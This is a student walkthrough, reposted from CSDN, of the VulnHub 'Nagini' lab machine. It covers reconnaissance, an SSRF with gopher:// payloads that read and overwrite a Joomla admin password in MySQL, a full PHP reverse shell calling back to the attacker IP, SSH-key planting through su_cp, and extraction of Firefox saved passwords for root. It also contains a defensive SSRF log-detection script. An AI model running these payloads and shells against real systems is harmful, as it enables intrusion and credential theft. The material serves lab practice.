VulnHub: Nagini (detailed walkthrough)


Preface:

This machine is a lab my teacher covered in class, and this is my attempt to reproduce it. I went back and forth on it for two or three days and realised just how weak I still am; some parts may read as disjointed or abrupt, and this is as far as my ability allows. I also relied on the write-ups of two experts (I could barely even keep up while copying them...), and many of the concepts I only applied mechanically without really understanding them, so I will revise this once I understand them better. This article will keep being updated and refined as I grow.

The original write-ups are here:

http://www.vxer.cn/?id=80

https://nepcodex.com/2021/05/vulnhub-nagini-walkthrough-harry-potter-series/

Contents

Information gathering

Scanning the subnet

Scanning ports

Scanning the website for directories and files

Viewing file contents

Finding the vulnerability

Scanning the IP based on the CMS type

Inspecting the configuration file and finding key information

Listing database names

Listing table names

Listing the columns of a table

Querying the data

Updating the password in the database

Logging in to the admin backend

Getting a reverse shell

Shell obtained

Privilege escalation

Obtaining the first encoded string

Looking around the home directories

Logging in as the snape user

Logging in as the hermoine user

Obtaining the second encoded string

Privilege escalation

Getting root

Obtaining the last encoded string


Information gathering

Scanning the subnet

nmap -sP 192.168.179.0/24

Scanning ports

nmap -sS -sV -p- -v 192.168.179.130

Scanning the website for directories and files

gobuster dir -u http://192.168.179.130 -x html,txt,php,bak --wordlist=/usr/share/wordlists/dirb/common.txt

Honestly, folks, I borrowed this scan command from someone else. At first I just pointed dir straight at the domain; that also turns up these files, but with no filtering the list of directories is enormous and you have to go through them one by one, so I adopted the expert's approach to be more efficient.

Viewing file contents

The hint here is that an HTTP/3 environment is needed to see the content hidden in the page, but I simply could not manage it. I spent a long time on this environment and never got it set up, so I had no choice but to skip this step. I have pasted some related articles below for anyone who needs to set up the environment (and if you do get it working, I would be grateful for any pointers).

A highly-rated GitHub document: https://github.com/curl/curl/blob/master/docs/HTTP3.md

Another approach: https://github.com/cloudflare/quiche

A related blog post: http://m.blog.chinaunix.net/uid-405749-id-5844453.html

Finding the vulnerability

This is the information hidden in the page. Even though I skipped that step, I am pasting it here so that nobody is left confused.

http://192.168.179.130/internalResourceFeTcher.php?url=file:///etc/passwd

Scanning the IP based on the CMS type

joomscan -u http://192.168.179.130/joomla -ec

This is clearly a configuration file.

Inspecting the configuration file and finding key information

wget http://192.168.179.130/joomla/configuration.php.bak
cat configuration.php.bak

Gopherus will be used below: https://github.com/tarunkant/Gopherus

Running it requires pip2; if your Kali does not have pip2, see:

https://bootstrap.pypa.io/pip/2.7/get-pip.py
python2 get-pip.py
pip2

Right now we only know the username, and no password is set, so we use the Gopherus tool.

The username is the one we know, followed by the query we want to run, and last comes the generated payload. The whole payload must be copied, URL-encoded, and appended after http://quic.nagini.hogwarts/internalResourceFeTcher.php?url= ; the leading gopher:%2f%2f127.0.0.1:3306%2f_ portion must be exactly as shown.

Listing database names

http://192.168.179.130/internalResourceFeTcher.php?url=gopher:%2f%2f127.0.0.1:3306%2f_%25a5%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2567%256f%2562%256c%2569%256e%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2510%2500%2500%2500%2503%2573%2568%256f%2577%2520%2564%2561%2574%2561%2562%2561%2573%2565%2573%253b%2501%2500%2500%2500%2501

If the result does not appear on the first visit, refresh a few times.
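As an added defender-side example that is not part of the original walkthrough: a small Python log check that applies the same decoding rule described above (the url parameter is percent-decoded once by the server before the fetcher sees it) to constructed access-log lines, and flags fetcher targets that use a non-HTTP scheme such as file:// or gopher:// or that point at loopback or private addresses. The log lines, the 10.0.0.9 client address and the function names are constructed for this example.

```python
import ipaddress
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote, urlsplit

# Constructed access-log lines (not from the original page), modelled on the
# internalResourceFeTcher.php?url= requests shown in the walkthrough.
SAMPLE_LOG = """\
10.0.0.9 - - [02/Jan/2023:14:48:56 +0000] "GET /internalResourceFeTcher.php?url=http%3A%2F%2Fexample.com%2Findex.html HTTP/1.1" 200 512
10.0.0.9 - - [02/Jan/2023:14:49:10 +0000] "GET /internalResourceFeTcher.php?url=file:///etc/passwd HTTP/1.1" 200 1934
10.0.0.9 - - [02/Jan/2023:14:50:02 +0000] "GET /internalResourceFeTcher.php?url=gopher:%2f%2f127.0.0.1:3306%2f_%25a5%2500%2500%2501 HTTP/1.1" 200 77
10.0.0.9 - - [02/Jan/2023:14:50:40 +0000] "GET /internalResourceFeTcher.php?url=http://localhost/ HTTP/1.1" 200 300
10.0.0.9 - - [02/Jan/2023:14:51:30 +0000] "GET /joomla/index.php HTTP/1.1" 200 8192
"""

ALLOWED_SCHEMES = {"http", "https"}
REQUEST_RE = re.compile(r'"GET (?P<path>[^"\s]+)')
URL_PARAM_RE = re.compile(r'[?&]url=([^&\s"]*)')


def classify_fetch_url(raw_value: str) -> Optional[str]:
    """Reason a fetcher target is suspicious, or None. The value is decoded
    once (as PHP's $_GET does), so gopher:%2f%2f127.0.0.1 -> gopher://127..."""
    parts = urlsplit(unquote(raw_value))
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return f"non-http scheme {scheme!r}"  # file://, gopher://, dict://, ...
    host = (parts.hostname or "").lower()
    if host == "localhost":
        return "loopback hostname"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return None  # an ordinary external hostname
    if addr.is_loopback or addr.is_private or addr.is_link_local:
        return f"internal address {host}"
    return None


def find_ssrf_attempts(log_text: str) -> List[Tuple[str, str]]:
    # Scan access-log lines; collect (decoded target, reason) for each hit.
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for raw_value in URL_PARAM_RE.findall(m.group("path")):
            reason = classify_fetch_url(raw_value)
            if reason:
                hits.append((unquote(raw_value), reason))
    return hits
```

The same scheme and address checks, applied by the fetcher itself before it opens the URL, are the usual fix for this class of bug.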

Listing table names

USE joomla; SHOW tables;
http://192.168.179.130/internalResourceFeTcher.php?url=gopher:%2f%2f127.0.0.1:3306%2f_%25a5%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2567%256f%2562%256c%2569%256e%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2518%2500%2500%2500%2503%2555%2553%2545%2520%256a%256f%256f%256d%256c%2561%253b%2553%2548%254f%2557%2520%2574%2561%2562%256c%2565%2573%253b%2501%2500%2500%2500%2501

Listing the columns of a table

USE joomla; SELECT * FROM joomla_users;
http://192.168.179.130/internalResourceFeTcher.php?url=gopher:%2f%2f127.0.0.1:3306%2f_%25a5%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2567%256f%2562%256c%2569%256e%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2528%2500%2500%2500%2503%2575%2573%2565%2520%256a%256f%256f%256d%256c%2561%253b%2520%2573%2565%256c%2565%2563%2574%2520%252a%2520%2566%2572%256f%256d%2520%256a%256f%256f%256d%256c%2561%255f%2575%2573%2565%2572%2573%253b%2501%2500%2500%2500%2501

Querying the data

http://192.168.179.130/internalResourceFeTcher.php?url=gopher:%2f%2f127.0.0.1:3306%2f_%25a5%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2567%256f%2562%256c%2569%256e%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%255c%2500%2500%2500%2503%2555%2553%2545%2520%256a%256f%256f%256d%256c%2561%253b%2520%2553%2545%254c%2545%2543%2554%2520%2570%2561%2573%2573%2577%256f%2572%2564%2520%2546%2552%254f%254d%2520%256a%256f%256f%256d%256c%2561%255f%2575%2573%2565%2572%2573%2520%2557%2548%2545%2552%2545%2520%2565%256d%2561%2569%256c%253d%25e2%2580%2599%2573%2569%2574%2565%255f%2561%2564%256d%2569%256e%2540%256e%2561%2567%2569%256e%2569%252e%2568%256f%2567%2577%2561%2572%2574%2573%25e2%2580%2599%253b%2501%2500%2500%2500%2501

I could not figure out what went wrong; it just reports a syntax error, so I will leave this aside for now.

We already know the username is goblin and the password is empty, so we can use UPDATE to write a password of our own choosing into the database, after which we can log in.

The password we chose is password, whose MD5 value is: 5f4dcc3b5aa765d61d8327deb882cf99

Updating the password in the database

USE joomla; UPDATE joomla_users SET password='5f4dcc3b5aa765d61d8327deb882cf99' WHERE email='site_admin@nagini.hogwarts';
http://192.168.179.130/internalResourceFeTcher.php?url=gopher:%2f%2f127.0.0.1:3306%2f_%25a5%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2567%256f%2562%256c%2569%256e%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%258a%2500%2500%2500%2503%2575%2573%2565%2520%256a%256f%256f%256d%256c%2561%253b%2520%2575%2570%2564%2561%2574%2565%2520%256a%256f%256f%256d%256c%2561%255f%2575%2573%2565%2572%2573%2520%2573%2565%2574%2520%2570%2561%2573%2573%2577%256f%2572%2564%2520%253d%2520%2527%2535%2566%2534%2564%2563%2563%2533%2562%2535%2561%2561%2537%2536%2535%2564%2536%2531%2564%2538%2533%2532%2537%2564%2565%2562%2538%2538%2532%2563%2566%2539%2539%2527%2520%2577%2568%2565%2572%2565%2520%2575%2573%2565%2572%256e%2561%256d%2565%253d%2527%2573%2569%2574%2565%255f%2561%2564%256d%2569%256e%2527%253b%2573%2565%256c%2565%2563%2574%2520%252a%2520%2566%2572%256f%256d%2520%256a%256f%256f%256d%256c%2561%255f%2575%2573%2565%2572%2573%253b%2501%2500%2500%2500%2501

 

 

 

The password was successfully updated in the database.

Logging in to the admin backend

Username: site_admin

Password: password

Getting a reverse shell

First start a listener on Kali.

Log in to the backend and write the script.

Click "New File" at the top to create a new file.

Write in the PHP reverse-shell code:

<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "192.168.179.145";
$yourport = '1234';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?> 

I have pasted the code here. I found it online and wanted to link to the original author, but after a long search I could not find it.

It is also very convenient: you only need to change the IP address and listening port to your own.

Visit the file's location:

http://192.168.179.130/joomla/templates/protostar/rev.php

Shell obtained

Use Python to spawn an interactive shell:

python3 -c "import pty;pty.spawn('/bin/bash')"

Privilege escalation

Go into the website directory, where a txt file is found.

Obtaining the first encoded string

View the contents of the txt file:

cat horcrux1.txt

horcrux_{MzogU2x5dGhFcmlOJ3MgTG9jS0VldCBkRXN0cm9ZZUQgYlkgUm9O}

The content is in a flag-like format. I guessed it was encoded somehow but could not work out how, so I just noted it down for now.

Judging from the later values the encoding is the same everywhere, so decoding this one with base64 as well gives:

3: SlythEriN's LocKEet dEstroYeD bY RoN

Looking around the home directories

There are two directories; go into the first one first.

View the txt file:

No permission, nothing can be read.

Look at the files in the bin directory:

cat su_cp

No way forward, so back to square one: look at the other directory under home.

Try to view this file:

cat .creds.txt

TG92ZUBsaWxseQ==

This is clearly base64-encoded; decode it:

Love@lilly

It looks like an email address, or it may be snape's password.

Logging in as the snape user

Log in via ssh:

ssh snape@192.168.179.130

On Kali:

ssh-keygen
(press Enter through every prompt)

Copy the content into /home/snape on the snape side:

echo "ssh-rsa <public key omitted> root@locahost" > authorized_keys
chmod 640 authorized_keys
ls -al

cd /home/hermoine/bin
./su_cp -p /home/snape/authorized_keys /home/hermoine/.ssh/
ls -al

On Kali:
ssh hermoine@192.168.179.130 -i .ssh/id_rsa

#########
Everything we did above was so that we can log in as the hermoine user without a password.

Logging in as the hermoine user

Obtaining the second encoded string

View the file horcrux2.txt:

cat horcrux2.txt
horcrux_{NDogSGVsZ2EgSHVmZmxlcHVmZidzIEN1cCBkZXN0cm95ZWQgYnkgSGVybWlvbmU=}

This is clearly base64-encoded; decoding gives:

4: Helga Hufflepuff's Cup destroyed by Hermione

Privilege escalation

cd .mozilla/firefox/g2mhbq0o.default/
ls -al

which python
which python3

Start an HTTP server with python3:

python3 -m http.server 9000

Use a tool to extract the usernames and passwords saved in the browser:

GitHub: https://github.com/lclevy/firepwd

Download the package locally and unzip it:

unzip firepwd-master.zip
cd firepwd-master
sudo pip install -r requirements.txt
mkdir creds
cd creds
cp ~/Desktop/firepwd-master/firepwd.py ~/Desktop/firepwd-master/creds
wget http://192.168.179.130:9000//logins.json
wget http://192.168.179.130:9000//key4.db

Run it:

python3 firepwd.py

The administrator's account and password are successfully dumped.

But when I ran it I got ModuleNotFoundError: No module named 'Crypto'

pip3 install pycrypto    (install this module)

Then another error appeared: ModuleNotFoundError: No module named 'Crypto.Util.Padding'

pip3 install pycryptodome    (install one more module)

After that it runs fine.

Getting root

Log in with the account and password obtained:

Username: root

Password: @Alohomora#123

cd /home/root
ls -al

Obtaining the last encoded string

View the txt file:

cat horcrux3.txt

horcrux_{NTogRGlhZGVtIG9mIFJhdmVuY2xhdyBkZXN0cm95ZWQgYnkgSGFycnk=}

Decode it.

The last encoded string yields:

5: Diadem of Ravenclaw destroyed by Harry

Copyright notice: this article comes from CSDN; thanks to the original author. It is licensed under CC 4.0 BY-SA; when reposting, include a link to the original source and this notice.
Original link: https://blog.csdn.net/weixin_50688050/article/details/117445091
Published 2023-01-02 14:48:56
